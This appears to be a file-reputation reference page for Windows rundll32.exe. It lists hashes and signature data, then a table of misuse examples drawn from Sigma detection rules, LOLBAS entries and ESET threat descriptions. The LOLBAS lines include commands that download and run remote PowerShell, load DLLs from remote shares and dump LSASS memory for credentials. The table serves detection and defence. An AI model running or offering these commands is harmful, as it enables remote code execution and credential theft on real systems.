rundll32.exe

  • File Path: C:\Windows\SysWOW64\rundll32.exe
  • Description: Windows host process (Rundll32)

Hashes

Type Hash
MD5 111474C61232202B5B588D2B512CBB25
SHA1 E9BF6CAAF1A4A146BF3FB94D986666DECCCD7537
SHA256 D25FF1E6C6460A7F9DE39198D182058C1712726008D187E1953B83ABE977E4A0
SHA384 DDCF8D03C777B8A01E6AC89FA5BA774C4B18FE19C3BC9F6C59F99001B788E5FF8C2CDA8C7800F8307209F01FF68EA954
SHA512 05E3F4A3683E67CB5DD7E434E3619CBF04103B1907A18B04B61F06013FA1F925BA9E279509FB2DF6B738E35D136E44121008980EF33E4F55AB480DD9B440427D
SSDEEP 1536:557g1LwvkpZruNJosIB/ROln5IUmDjoXp:5MtjCNysI9ROln5I0

Signature

  • Status: Signature verified.
  • Serial: 33000000BCE120FDD27CC8EE930000000000BC
  • Thumbprint: E85459B23C232DB3CB94C7A56D47678F58E8E51E
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: RUNDLL32.EXE.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.14393.0 (rs1_release.160715-1616)
  • Product Version: 10.0.14393.0
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\system32\rundll32.exe 40
C:\windows\system32\rundll32.exe 49
C:\Windows\system32\rundll32.exe 44
C:\Windows\system32\rundll32.exe 41
C:\Windows\system32\rundll32.exe 38
C:\WINDOWS\system32\rundll32.exe 44
C:\Windows\SysWOW64\rundll32.exe 44
C:\Windows\SysWOW64\rundll32.exe 43
C:\Windows\SysWOW64\rundll32.exe 41
C:\windows\SysWOW64\rundll32.exe 54
C:\WINDOWS\SysWOW64\rundll32.exe 44

Possible Misuse

The following table contains possible examples of rundll32.exe being misused. While rundll32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma win_invoke_obfuscation_via_rundll_services.yml ImagePath\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma win_invoke_obfuscation_via_rundll_services_security.yml ServiceFileName\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services.yml ImagePath\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services_security.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services_security.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services_security.yml ServiceFileName\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' DRL 1.0
sigma win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml - 'rundll32' DRL 1.0
sigma win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml - 'rundll32' DRL 1.0
sigma win_user_driver_loaded.yml - '\Windows\System32\rundll32.exe' DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml title: PowerShell Rundll32 Remote Thread Creation DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml description: Detects PowerShell remote thread creation in Rundll32.exe DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml TargetImage\|endswith: '\rundll32.exe' DRL 1.0
sigma driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml - 'rundll32' DRL 1.0
sigma sysmon_creation_system_file.yml - '\rundll32.exe' DRL 1.0
sigma sysmon_mimikatz_inmemory_detection.yml Image: 'C:\Windows\System32\rundll32.exe' DRL 1.0
sigma sysmon_suspicious_dbghelp_dbgcore_load.yml - '\rundll32.exe' DRL 1.0
sigma sysmon_rundll32_net_connections.yml title: Rundll32 Internet Connection DRL 1.0
sigma sysmon_rundll32_net_connections.yml description: Detects a rundll32 that communicates with public IP addresses DRL 1.0
sigma sysmon_rundll32_net_connections.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma powershell_invoke_obfuscation_via_rundll.yml Payload\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32.yml Payload\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' DRL 1.0
sigma powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml ScriptBlockText\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml ScriptBlockText\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' DRL 1.0
sigma powershell_suspicious_keywords.yml - "rundll32" DRL 1.0
sigma sysmon_lsass_dump_comsvcs_dll.yml description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. DRL 1.0
sigma sysmon_lsass_dump_comsvcs_dll.yml SourceImage: 'C:\Windows\System32\rundll32.exe' DRL 1.0
sigma process_creation_c3_load_by_rundll32.yml title: F-Secure C3 Load by Rundll32 DRL 1.0
sigma process_creation_c3_load_by_rundll32.yml - 'rundll32.exe' DRL 1.0
sigma process_creation_cobaltstrike_load_by_rundll32.yml title: CobaltStrike Load by Rundll32 DRL 1.0
sigma process_creation_cobaltstrike_load_by_rundll32.yml description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. DRL 1.0
sigma process_creation_cobaltstrike_load_by_rundll32.yml - 'rundll32.exe' DRL 1.0
sigma process_creation_lolbins_by_office_applications.yml - 'rundll32' DRL 1.0
sigma process_creation_lolbins_with_wmiprvse_parent_process.yml - 'rundll32' DRL 1.0
sigma process_creation_office_from_proxy_executing_regsvr32_payload.yml - 'rundll32' DRL 1.0
sigma process_creation_office_from_proxy_executing_regsvr32_payload2.yml - '*rundll32*' DRL 1.0
sigma sysmon_susp_webdav_client_execution.yml description: A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server). DRL 1.0
sigma sysmon_susp_webdav_client_execution.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma sysmon_vmtoolsd_susp_child_process.yml - '\rundll32.exe' DRL 1.0
sigma win_apt_equationgroup_dll_u_load.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma win_apt_lazarus_activity_apr21.yml - 'C:\Windows\System32\rundll32.exe' DRL 1.0
sigma win_apt_lazarus_loader.yml - 'rundll32.exe ' DRL 1.0
sigma win_apt_sofacy.yml - 'rundll32.exe' DRL 1.0
sigma win_apt_taidoor.yml - 'rundll32.exe' DRL 1.0
sigma win_apt_unc2452_cmds.yml - 'rundll32.exe' DRL 1.0
sigma win_apt_unc2452_cmds.yml ParentImage\|endswith: '\rundll32.exe' DRL 1.0
sigma win_apt_unc2452_cmds.yml - 'rundll32 c:\windows\' DRL 1.0
sigma win_apt_unc2452_ps.yml - 'rundll32 c:\windows' DRL 1.0
sigma win_apt_unc2452_ps.yml - 'process call create "rundll32 c:\windows' DRL 1.0
sigma win_apt_zxshell.yml - '\rundll32.exe' DRL 1.0
sigma win_bad_opsec_sacrificial_processes.yml description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' DRL 1.0
sigma win_bad_opsec_sacrificial_processes.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 DRL 1.0
sigma win_bad_opsec_sacrificial_processes.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma win_bad_opsec_sacrificial_processes.yml CommandLine\|endswith: '\rundll32.exe' DRL 1.0
sigma win_crime_fireball.yml description: Detects Archer malware invocation via rundll32 DRL 1.0
sigma win_crime_fireball.yml - 'rundll32.exe' DRL 1.0
sigma win_html_help_spawn.yml - '\rundll32.exe' DRL 1.0
sigma win_impacket_lateralization.yml # runs %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe DRL 1.0
sigma win_invoke_obfuscation_via_rundll.yml CommandLine\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32.yml CommandLine\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' DRL 1.0
sigma win_malware_notpetya.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma win_malware_trickbot_wermgr.yml description: Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe DRL 1.0
sigma win_malware_trickbot_wermgr.yml - '\rundll32.exe' DRL 1.0
sigma win_meterpreter_or_cobaltstrike_getsystem_service_start.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma win_meterpreter_or_cobaltstrike_getsystem_service_start.yml - 'rundll32' DRL 1.0
sigma win_office_shell.yml - '\rundll32.exe' DRL 1.0
sigma win_powershell_dll_execution.yml - '\rundll32.exe' DRL 1.0
sigma win_powershell_dll_execution.yml - 'Windows-Hostprozess (Rundll32)' DRL 1.0
sigma win_process_dump_rundll32_comsvcs.yml title: Process Dump via Rundll32 and Comsvcs.dll DRL 1.0
sigma win_redmimicry_winnti_proc.yml - rundll32.exe DRL 1.0
sigma win_renamed_binary.yml - 'rundll32.exe' DRL 1.0
sigma win_renamed_binary.yml - '\rundll32.exe' DRL 1.0
sigma win_renamed_binary_highly_relevant.yml - "rundll32.exe" DRL 1.0
sigma win_renamed_binary_highly_relevant.yml - '\rundll32.exe' DRL 1.0
sigma win_rundll32_without_parameters.yml title: Rundll32 Without Parameters DRL 1.0
sigma win_rundll32_without_parameters.yml description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module DRL 1.0
sigma win_rundll32_without_parameters.yml CommandLine: 'rundll32.exe' DRL 1.0
sigma win_script_event_consumer_spawn.yml - '\rundll32.exe' DRL 1.0
sigma win_shell_spawn_susp_program.yml - '\rundll32.exe' DRL 1.0
sigma win_susp_child_process_as_system_.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_comsvcs_procdump.yml description: Detects process memory dump via comsvcs.dll and rundll32 DRL 1.0
sigma win_susp_comsvcs_procdump.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_comsvcs_procdump.yml OriginalFileName: 'RUNDLL32.EXE' DRL 1.0
sigma win_susp_control_dll_load.yml description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits DRL 1.0
sigma win_susp_control_dll_load.yml Image\|endswith: '\rundll32.exe ' DRL 1.0
sigma win_susp_curl_start_combo.yml - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 DRL 1.0
sigma win_susp_emotet_rudll32_execution.yml title: Emotet RunDLL32 Process Creation DRL 1.0
sigma win_susp_emotet_rudll32_execution.yml description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,#1 DRL 1.0
sigma win_susp_emotet_rudll32_execution.yml - '\rundll32.exe' DRL 1.0
sigma win_susp_emotet_rudll32_execution.yml - '\tracker.exe' #When Visual Studio compile NodeJS program, it might use MSBuild to create tracker.exe and then, the tracker.exe fork rundll32.exe DRL 1.0
sigma win_susp_odbcconf.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_pcwutl.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_powershell_parent_process.yml - '\rundll32.exe' DRL 1.0
sigma win_susp_rundll32_activity.yml title: Suspicious Rundll32 Activity DRL 1.0
sigma win_susp_rundll32_activity.yml description: Detects suspicious process related to rundll32 based on arguments DRL 1.0
sigma win_susp_rundll32_by_ordinal.yml description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal DRL 1.0
sigma win_susp_rundll32_by_ordinal.yml - '\rundll32.exe' DRL 1.0
sigma win_susp_rundll32_inline_vbs.yml title: Suspicious Rundll32 Invoking Inline VBScript DRL 1.0
sigma win_susp_rundll32_inline_vbs.yml description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 DRL 1.0
sigma win_susp_rundll32_inline_vbs.yml - 'rundll32.exe' DRL 1.0
sigma win_susp_rundll32_no_params.yml title: Suspicious Rundll32 Without Any CommandLine Params DRL 1.0
sigma win_susp_rundll32_no_params.yml description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity DRL 1.0
sigma win_susp_rundll32_no_params.yml CommandLine\|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_rundll32_setupapi_installhinfsection.yml title: Suspicious Rundll32 Setupapi.dll Activity DRL 1.0
sigma win_susp_rundll32_setupapi_installhinfsection.yml ParentImage\|endswith: '\rundll32.exe' DRL 1.0
sigma win_susp_rundll32_sys.yml title: Suspicious Rundll32 Activity Invoking Sys File DRL 1.0
sigma win_susp_rundll32_sys.yml description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 DRL 1.0
sigma win_susp_rundll32_sys.yml CommandLine\|contains: 'rundll32.exe' DRL 1.0
sigma win_susp_servu_process_pattern.yml - '\rundll32.exe' DRL 1.0
sigma win_susp_shimcache_flush.yml - 'rundll32' DRL 1.0
sigma win_susp_spoolsv_child_processes.yml Image\|endswith: \rundll32.exe DRL 1.0
sigma win_susp_spoolsv_child_processes.yml CommandLine\|endswith: rundll32.exe DRL 1.0
sigma win_susp_wmic_proc_create_rundll32.yml title: Suspicious WMI Execution Using Rundll32 DRL 1.0
sigma win_susp_wmic_proc_create_rundll32.yml description: Detects WMI executing rundll32 DRL 1.0
sigma win_susp_wmic_proc_create_rundll32.yml - 'rundll32' DRL 1.0
sigma win_system_exe_anomaly.yml - '\rundll32.exe' DRL 1.0
sigma sysmon_modify_screensaver_binary_path.yml - '\rundll32.exe' DRL 1.0
sigma driver_load_invoke_obfuscation_via_rundll_services.yml ImagePath\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_rundll32_services.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_rundll32_services.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_rundll32_services.yml ImagePath\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' DRL 1.0
sigma win_possible_privilege_escalation_using_rotten_potato.yml Image\|endswith: '\rundll32.exe' DRL 1.0
LOLBAS Dfsvc.yml - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo  
LOLBAS Rundll32.yml Name: Rundll32.exe  
LOLBAS Rundll32.yml - Command: rundll32.exe AllTheThingsx64,EntryPoint  
LOLBAS Rundll32.yml - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.  
LOLBAS Rundll32.yml - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).  
LOLBAS Rundll32.yml - Command: rundll32.exe -sta {CLSID}  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.  
LOLBAS Rundll32.yml - Path: C:\Windows\System32\rundll32.exe  
LOLBAS Rundll32.yml - Path: C:\Windows\SysWOW64\rundll32.exe  
LOLBAS Rundll32.yml - Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/  
LOLBAS Rundll32.yml - Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md  
LOLBAS Advpack.yml Description: Utility for installing software and drivers with rundll32.exe  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,RegisterOCX test.dll  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe  
LOLBAS Advpack.yml - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"  
LOLBAS comsvcs.yml - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe  
LOLBAS Ieadvpack.yml - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"  
LOLBAS Ieframe.yml - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"  
LOLBAS Mshtml.yml - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"  
LOLBAS Pcwutl.yml - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe  
LOLBAS Setupapi.yml - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf  
LOLBAS Setupapi.yml - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf  
LOLBAS Shdocvw.yml - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"  
LOLBAS Shell32.yml - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll  
LOLBAS Shell32.yml - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe  
LOLBAS Shell32.yml - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"  
LOLBAS Syssetup.yml - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf  
LOLBAS Syssetup.yml - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf  
LOLBAS Url.yml - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta"  
LOLBAS Url.yml - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"  
LOLBAS Url.yml - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e  
LOLBAS Url.yml - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe  
LOLBAS Url.yml - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e  
LOLBAS Url.yml - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta  
LOLBAS Zipfldr.yml - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe  
LOLBAS Zipfldr.yml - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e  
malware-ioc misp-dukes-operation-ghost-event.json "value": "Rundll32 - T1085", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "tag_name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
malware-ioc invisimole.yar $s13 = "rundll32.exe \"%s\",StartUI" © ESET 2014-2018
malware-ioc misp_invisimole.json "value": "%WINDIR%\\SysWOW64\\drivers\\Rundll32.exe", © ESET 2014-2018
malware-ioc misp_invisimole.json "value": "Rundll32 - T1085", © ESET 2014-2018
malware-ioc misp_invisimole.json "tag_name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)\n\nAnother bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.\n\nOne variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.\n\nA third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named <code>March 25 \\u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. \n\nAdversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.(Citation: Threatexpress MetaTwin 2017)\n\n### Windows\nIn another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)\n\nAn example of abuse of trusted locations in Windows would be the <code>C:\\Windows\\System32</code> directory. Examples of trusted binary names that can be given to malicious binares include \"explorer.exe\" and \"svchost.exe\".\n\n### Linux\nAnother variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)\n\nAn example of abuse of trusted locations in Linux would be the <code>/bin</code> directory. Examples of trusted binary names that can be given to malicious binaries include \"rsyncd\" and \"dbus-inotifier\". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)", © ESET 2014-2018
malware-ioc misp_invisimole.json "name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
